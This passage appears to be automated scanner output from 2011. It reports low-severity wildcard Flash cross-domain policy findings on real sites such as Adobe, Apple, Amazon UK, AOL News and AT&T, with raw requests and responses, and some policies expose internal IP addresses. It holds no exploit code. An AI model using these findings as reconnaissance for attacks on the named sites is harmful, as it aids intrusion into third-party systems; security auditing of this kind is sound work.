<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.156. http://www.123greetings.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.123greetings.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.123greetings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:21 GMT
Expires: Sat, 02 Apr 2011 13:41:34 GMT
Last-Modified: Thu, 25 Jun 2009 06:57:01 GMT
Cache-Control: max-age=900
Content-Type: text/xml
ETag: "136-bb09a940"
Accept-Ranges: bytes
Server: Apache/2.2.3 (CentOS)
Content-Length: 310
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.123greetings.com" />
<allow-access-from domain="*.123g.us" />
<allow-access-from domain="192.168.0.61" />
...[SNIP]...

7.157. http://www.4shared.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=345229067; Expires=Tue, 30-Mar-2021 13:24:10 GMT; Path=/
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:24:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.4shared.com" />
<allow-access-from domain="*.4shared-china.com" />
<allow-access-from domain="*.4s.io" />
<allow-access-from domain="*.rumusic.org" />
<allow-access-from domain="*.19de9e7959fdb976322649b8.com" />
...[SNIP]...

7.158. http://www.4tubemate.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4tubemate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4tubemate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:32 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT
Accept-Ranges: bytes
Content-Length: 218
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.naiadsystems.com" />
</cros
...[SNIP]...

7.159. http://www.6pm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.6pm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.6pm.com

Response

HTTP/1.0 200 OK
Server: nginx/0.9.4
Content-Type: application/xml
Last-Modified: Fri, 25 Mar 2011 20:56:09 GMT
Content-Length: 236
X-UUID: 61f40e6e-588e-11e0-82a7-001a645b7cf4
Date: Sat, 02 Apr 2011 14:06:07 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="overlay.tv" secure="false"/><allow-access-from domain="*.overlay.tv" secure="false"/><allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...

7.160. http://www.acehardware.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:39 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:06:39 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

7.161. http://www.adobe.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Fri, 01 Apr 2011 12:39:00 GMT
Keep-Alive: timeout=5, max=492
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Sat, 02 Apr 2011 12:37:36 GMT
Age: 386
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

7.162. http://www.ae.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ae.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ae.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 24 Feb 2010 11:38:20 GMT
ETag: "276-480571a624300"
Accept-Ranges: bytes
Content-Length: 630
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:31:35 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ae.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aezone.com" to-ports="80,82" secure="false"/>
...[SNIP]...
<allow-access-from domain="testvipd5.scene7.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net/a755bdded7308e72e7fac2eae90715fc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="10.96.103.13" to-ports="80,82" secure="false"/>
...[SNIP]...
<allow-access-from domain="10.100.108.20" to-ports="80,82" secure="false"/>
...[SNIP]...

7.163. http://www.aeropostale.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aeropostale.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aeropostale.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:09 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT
ETag: "4fc0bd-233-48bf5ef3f6400"
Accept-Ranges: bytes
Content-Length: 563
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:39:09 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.aeropostale.com" />
<allow-access-from domain="aero.imageg.net" />
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.ps4u.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="63.240.110.143" />
<allow-access-from domain="206.16.220.143" />
<allow-access-from domain="172.20.1.143" />
<allow-access-from domain="172.21.1.143" />
...[SNIP]...

7.164. http://www.allbusiness.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allbusiness.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:41 GMT
Server: Apache
Last-Modified: Fri, 01 Oct 2010 01:06:57 GMT
ETag: "82"
Accept-Ranges: bytes
Content-Length: 130
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
       <allow-access-from domain="*.brightcove.com" secure="false"/>
</cross-domain-policy>

7.165. http://www.allposters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.allposters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allposters.com

Response

HTTP/1.0 200 OK
Cteonnt-Length: 590
Content-Type: text/xml
Last-Modified: Thu, 26 Feb 2009 18:46:14 GMT
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Date: Sat, 02 Apr 2011 13:31:48 GMT
Content-Length: 590
Connection: close
Set-Cookie: TLTSID=CF9AA2DC4CDDAE840BA64199B51669BA; domain=.allposters.com; path=/
Set-Cookie: TLTUID=CF9AA2DC4CDDAE840BA64199B51669BA; domain=.allposters.com; path=/; expires=Sat, 02-04-2021 13:31:49 GMT
Set-Cookie: NSC_xxx_bqd=ffffffff098a1cdc45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 13:33:48 GMT;path=/;httponly

...<?xml version="1.0"? encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-doma
...[SNIP]...
<allow-access-from domain="*.allposters.com"/>
   <allow-access-from domain="*.allposters.co.uk"/>
   <allow-access-from domain="*.art.com"/>
   <allow-access-from domain="*.art.co.uk"/>
...[SNIP]...

7.166. http://www.allrecipes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.allrecipes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allrecipes.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 218
Content-Type: text/xml
Last-Modified: Thu, 18 Jan 2007 23:00:58 GMT
Accept-Ranges: bytes
ETag: "6af14e84543bc71:1386"
Server: Microsoft-IIS/6.0
X-Powered-By: WEB205
Date: Sat, 02 Apr 2011 13:25:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.allrecipes.com" />
</cr
...[SNIP]...

7.167. http://www.altavista.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.altavista.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.altavista.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:54 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

7.168. http://www.amazon.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.amazon.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.amazon.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:07 GMT
Server: Server
Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT
ETag: "3e0-8d97ef00"
Accept-Ranges: bytes
Content-Length: 992
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.amazon.com" />
<allow
...[SNIP]...
<allow-access-from domain="anon.amazon.speedera.net" />
<allow-access-from domain="*.images-amazon.com" />
<allow-access-from domain="*.ssl-images-amazon.com" />
<allow-access-from domain="*.amazon.ca" />
<allow-access-from domain="*.amazon.cn" />
<allow-access-from domain="*.amazon.de" />
<allow-access-from domain="*.amazon.fr" />
<allow-access-from domain="*.amazon.it" />
<allow-access-from domain="*.amazon.jp" />
<allow-access-from domain="*.amazon.co.jp" />
<allow-access-from domain="*.amazon.uk" />
<allow-access-from domain="*.amazon.co.uk" />
...[SNIP]...

7.169. http://www.americangreetings.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.americangreetings.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.americangreetings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:50 GMT
Server: Apache
Last-Modified: Mon, 17 May 2010 17:14:32 GMT
ETag: "849ae-19f-5bb74e00"
Accept-Ranges: bytes
Content-Length: 415
Content-Type: text/xml
Vary: Accept-Encoding
Connection: close
Set-Cookie: lbsegment=95;path=/;domain=.americangreetings.com;

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.beta.americangreetings.com" />
<allow-access-from domain="*.americangreetings.com" />
<allow-access-from domain="*.imgag.com" secure="false" />
...[SNIP]...

7.170. http://www.aolnews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:20 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2128
Keep-Alive: timeout=5, max=999945
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.digitas.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.publishing.aol.com" />

<allow-access-from domain="*.rewind.com" />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.tmz.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.video.aol.com" />
<allow-access-from domain="*.video.office.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" />

<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="publishing.aol.com" />
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="tmz.warnerbros.com" />
...[SNIP]...

7.171. http://www.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
X-N: S
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=313
Expires: Sat, 02 Apr 2011 12:48:03 GMT
Date: Sat, 02 Apr 2011 12:42:50 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

7.172. http://www.associatedcontent.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.associatedcontent.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.associatedcontent.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:13 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Fri, 25 Mar 2011 15:20:15 GMT
Accept-Ranges: bytes
Content-Length: 799
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.associatedcontent.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yahoo.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.acdn.us" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adinterax.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.joystickinteractive.com" secure="false"/>
...[SNIP]...

7.173. http://www.astrology.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.astrology.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.astrology.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/xml
Last-Modified: Wed, 30 Mar 2011 21:10:14 GMT
Cache-Control: max-age=3562
Expires: Sat, 02 Apr 2011 14:45:07 GMT
Date: Sat, 02 Apr 2011 13:45:45 GMT
Content-Length: 305
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="*.clearspring.com" />
...[SNIP]...

7.174. http://www.att.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.att.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.att.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 05 Oct 2010 20:19:38 GMT
ETag: "19b-491e4614f4a80"
Accept-Ranges: bytes
Content-Length: 411
Content-Type: application/xml
Date: Sat, 02 Apr 2011 12:37:47 GMT
Connection: close
Set-Cookie: TLTHID=03E218A65D26105D384BAB5B5D53C6B4; Path=/; Domain=.att.com
Set-Cookie: TLTSID=03E218A65D26105D384BAB5B5D53C6B4; Path=/; Domain=.att.com
Set-Cookie: TLTUID=03E218A65D26105D384BAB5B5D53C6B4; Path=/; Domain=.att.com; Expires=Sat, 02-04-2021 12:37:47 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*.att.com"/>
   <allow-access-from domain="*.cingular.com"/>
   <allow-access-from domain="*.cingular.net"/>
   <allow-access-from domain="seattle.razorfishtc.com"/>
...[SNIP]...

